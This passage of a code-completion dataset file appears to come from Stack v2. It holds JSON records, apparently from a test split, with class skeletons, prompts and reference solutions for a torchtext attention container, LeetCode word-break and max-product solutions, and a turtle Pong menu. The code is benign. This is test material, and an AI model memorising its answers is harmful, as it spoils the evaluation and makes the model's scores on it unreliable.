attn_output_weights)\n<|end_body_1|>\n", "revision_id": "45e4b8ca3615016625de15326a14668c8b58595d", "skeleton": "<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. 
bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiheadAttentionContainer:\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). 
Those are use\"\"\"\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "torchtext/nn/modules/multiheadattention.py", "source_repo": "pytorch/text", "split": "test", "star_events_count": 3640} {"blob_id": "cf0a99d362c3982a82258fef1c7ad9b13fa50320", "bodies": ["n = len(s)\nt = [None for i in range(n)]\nreturn self.word_break_aux(s, wordDict, n - 1, t)", "if s[:i + 1] in wordDict:\n return True\nelif t[i] is not None:\n return t[i]\nelse:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False"], "bodies_text": "<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000474", "length_bytes": 1231, "license_type": "permissive", "methods": [{"docstring": ":type s: str :type wordDict: Set[str] :rtype: bool", "name": "wordBreak", "signature": "def wordBreak(self, s, wordDict)"}, {"docstring": "Determine if s[:i + 1] can be segmented by dict wordDict", "name": "word_break_aux", "signature": "def word_break_aux(self, s, wordDict, i, t)"}], 
"n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003232", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def wordBreak(self, s, wordDict): :type s: str :type wordDict: Set[str] :rtype: bool\n- def word_break_aux(self, s, wordDict, i, t): Determine if s[:i + 1] can be segmented by dict wordDict", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def wordBreak(self, s, wordDict): :type s: str :type wordDict: Set[str] :rtype: bool\n- def word_break_aux(self, s, wordDict, i, t): Determine if s[:i + 1] can be segmented by dict wordDict\n\n<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n<|end_body_0|>\n\n<|body_start_1|>\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n<|end_body_1|>\n", "revision_id": "38acc65fa4315f86acb62874ca488620c5d77e17", "skeleton": "<|skeleton|>\nclass Solution:\n\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n <|body_0|>\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def wordBreak(self, s, wordDict):\n \"\"\":type s: str :type wordDict: Set[str] :rtype: bool\"\"\"\n n = len(s)\n t = [None for i in range(n)]\n return self.word_break_aux(s, wordDict, n - 1, t)\n\n def word_break_aux(self, s, wordDict, i, t):\n \"\"\"Determine if s[:i + 1] can be segmented by dict wordDict\"\"\"\n if s[:i + 1] in wordDict:\n return True\n elif t[i] is not None:\n return t[i]\n else:\n for j in range(i):\n if self.word_break_aux(s, wordDict, j, t) is True and s[j + 1:i + 1] in wordDict:\n t[i] = True\n return True\n else:\n t[i] = False\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "word_break/solution2.py", "source_repo": "mahimadubey/leetcode-python", "split": "test", "star_events_count": 0} {"blob_id": "52685abb0d8914dff0d4ba1bdc044e9ef07cd4e9", "bodies": ["N = len(nums)\nif N == 1:\n return nums[0]\ndpmax = [0 for i in range(N)]\ndpmin = [0 for i in range(N)]\ndpmax[0] = nums[0]\ndpmin[0] = nums[0]\nres = nums[0]\nfor i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\nreturn res", "N = len(nums)\nnumsTemp = nums[::-1]\nres = nums[0]\ntmp = nums[0]\nfor i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\ntmp = numsTemp[0]\nres2 = numsTemp[0]\nfor i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, 
res2)\nreturn max(res, res2)", "reverse_nums = nums[::-1]\nfor i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\nreturn max(nums + reverse_nums)"], "bodies_text": "<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000475", "length_bytes": 1637, "license_type": "no_license", "methods": [{"docstring": "使用动规,也就是 :param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}, {"docstring": "使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}, {"docstring": "为什么最后是加号???? 
:param nums: :return:", "name": "maxProduct", "signature": "def maxProduct(self, nums)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004193", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProduct(self, nums): 使用动规,也就是 :param nums: :return:\n- def maxProduct(self, nums): 使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\n- def maxProduct(self, nums): 为什么最后是加号???? :param nums: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxProduct(self, nums): 使用动规,也就是 :param nums: :return:\n- def maxProduct(self, nums): 使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\n- def maxProduct(self, nums): 为什么最后是加号???? :param nums: :return:\n\n<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n<|end_body_1|>\n\n<|body_start_2|>\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n<|end_body_2|>\n", "revision_id": "d8ad2da776066ac3fd99f246cb2b41a921c21a73", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n <|body_0|>\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n <|body_1|>\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? 
:param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxProduct(self, nums):\n \"\"\"使用动规,也就是 :param nums: :return:\"\"\"\n N = len(nums)\n if N == 1:\n return nums[0]\n dpmax = [0 for i in range(N)]\n dpmin = [0 for i in range(N)]\n dpmax[0] = nums[0]\n dpmin[0] = nums[0]\n res = nums[0]\n for i in range(1, N):\n dpmax[i] = max(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n dpmin[i] = min(dpmax[i - 1] * nums[i], dpmin[i - 1] * nums[i], nums[i])\n res = max(res, dpmax[i])\n return res\n\n def maxProduct(self, nums):\n \"\"\"使用正序和倒叙 两个计算方式,其实是使用 :param nums: :return:\"\"\"\n N = len(nums)\n numsTemp = nums[::-1]\n res = nums[0]\n tmp = nums[0]\n for i in range(1, N):\n if nums[i - 1] == 0:\n tmp = nums[i]\n else:\n tmp *= nums[i]\n res = max(tmp, res)\n tmp = numsTemp[0]\n res2 = numsTemp[0]\n for i in range(1, N):\n if numsTemp[i - 1] == 0:\n tmp = numsTemp[i]\n else:\n tmp *= numsTemp[i]\n res2 = max(tmp, res2)\n return max(res, res2)\n\n def maxProduct(self, nums):\n \"\"\"为什么最后是加号???? :param nums: :return:\"\"\"\n reverse_nums = nums[::-1]\n for i in range(1, len(nums)):\n nums[i] *= nums[i - 1] or 1\n reverse_nums[i] *= reverse_nums[i - 1] or 1\n return max(nums + reverse_nums)\n", "source": "the_stack_v2_python_sparse", "source_path": "Python/LeetCode/LeetCode152maxProduct.py", "source_repo": "540928898/LeetCodeMe", "split": "test", "star_events_count": 0} {"blob_id": "fa9ecb79eaa4d0c628c6e72fd3c6744e7d1b0eca", "bodies": ["super().__init__(visible=False)\nself.color('white')\nself.shape('square')\nself.setheading(90)\nself.shapesize(0.1, 1)\nself.speed(0)\nself.penup()\nself.pensize(3)\nself.game = game\nself.court = self.game.court\nself.court.onscreenclick(self.click)\nself.font_size = None", "self.penup()\nself.goto(-self.court.width, -self.court.height / 2)\nself.pendown()\nself.goto(self.court.width, -self.court.height / 2)\nself.penup()\nself.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\nself.pendown()\nself.goto(self.court.width, self.court.height / 2 - self.court.score_height)\nself.penup()\nself.goto(0, self.court.height / 2 - self.court.score_height)\nself.pendown()\nself.goto(0, -self.court.height / 2)\nself.penup()", "self.font_size = int(self.court.score_height / 4)\nself.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\nself.write('Play', font=('Monospace', self.font_size, 'bold'))", "self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\nself.stamp()\nself.goto(5, self.court.height / 2 - self.court.score_height / 2)\nself.stamp()", "print(x, y)\nif -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\nif -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()"], "bodies_text": "<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n 
self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Menu", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', 
font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000476", "length_bytes": 21836, "license_type": "no_license", "methods": [{"docstring": "Initialize game menu", "name": "__init__", "signature": "def __init__(self, game)"}, {"docstring": "Create court border", "name": "border", "signature": "def border(self)"}, {"docstring": "Create play button", "name": "play", "signature": "def play(self)"}, {"docstring": "Create pause button", "name": "pause", "signature": "def pause(self)"}, {"docstring": "Assign menu function on mouse click", "name": "click", "signature": "def click(self, x, y)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002399", "prompt": "Implement the Python class `Menu` described below.\n\nClass description:\nImplement the Menu class.\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize game menu\n- def border(self): Create court border\n- def play(self): Create play button\n- def pause(self): Create pause button\n- def click(self, x, y): Assign menu function on mouse click", "prompted_full_text": "Implement the Python class `Menu` described below.\n\nClass description:\nImplement the Menu class.\n\nMethod signatures and docstrings:\n- def __init__(self, game): Initialize game menu\n- def border(self): Create court border\n- def play(self): Create play button\n- def pause(self): Create pause button\n- def click(self, x, y): Assign menu function on mouse click\n\n<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n<|end_body_0|>\n\n<|body_start_1|>\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n 
self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, -self.court.height / 2)\n self.penup()\n<|end_body_1|>\n\n<|body_start_2|>\n self.font_size = int(self.court.score_height / 4)\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n<|end_body_2|>\n\n<|body_start_3|>\n self.goto(-5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n self.goto(5, self.court.height / 2 - self.court.score_height / 2)\n self.stamp()\n<|end_body_3|>\n\n<|body_start_4|>\n print(x, y)\n if -self.court.width / 2 <= x <= -self.court.width / 2 + self.court.width / 2 / 10 and self.court.height / 2 - self.court.score_height / 2 <= y <= self.court.height / 2:\n self.goto(-self.court.width / 2, self.court.height / 2 - self.court.score_height / 2)\n self.color('green')\n self.write('Play', font=('Monospace', self.font_size, 'bold'))\n self.game.reset()\n self.game.pause_state = False\n self.game.playing()\n self.game.ball.moving = True\n if self.game.humans == 1:\n self.game.p2.cpu()\n elif self.game.humans == 0:\n self.game.p1.cpu()\n self.game.p2.cpu()\n self.undo()\n if -5 <= x <= 5 and self.court.height / 2 - self.court.score_height <= y <= self.court.height / 2:\n self.game.pause()\n<|end_body_4|>\n", "revision_id": "982fb820257a425422305e076dbc4523f591dedb", "skeleton": "<|skeleton|>\nclass Menu:\n\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n <|body_0|>\n\n def border(self):\n \"\"\"Create court border\"\"\"\n <|body_1|>\n\n def play(self):\n \"\"\"Create play button\"\"\"\n <|body_2|>\n\n def pause(self):\n \"\"\"Create pause button\"\"\"\n <|body_3|>\n\n def click(self, x, y):\n \"\"\"Assign menu function on mouse click\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Menu:\n def __init__(self, game):\n \"\"\"Initialize game menu\"\"\"\n super().__init__(visible=False)\n self.color('white')\n self.shape('square')\n self.setheading(90)\n self.shapesize(0.1, 1)\n self.speed(0)\n self.penup()\n self.pensize(3)\n self.game = game\n self.court = self.game.court\n self.court.onscreenclick(self.click)\n self.font_size = None\n\n def border(self):\n \"\"\"Create court border\"\"\"\n self.penup()\n self.goto(-self.court.width, -self.court.height / 2)\n self.pendown()\n self.goto(self.court.width, -self.court.height / 2)\n self.penup()\n self.goto(-self.court.width, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(self.court.width, self.court.height / 2 - self.court.score_height)\n self.penup()\n self.goto(0, self.court.height / 2 - self.court.score_height)\n self.pendown()\n self.goto(0, 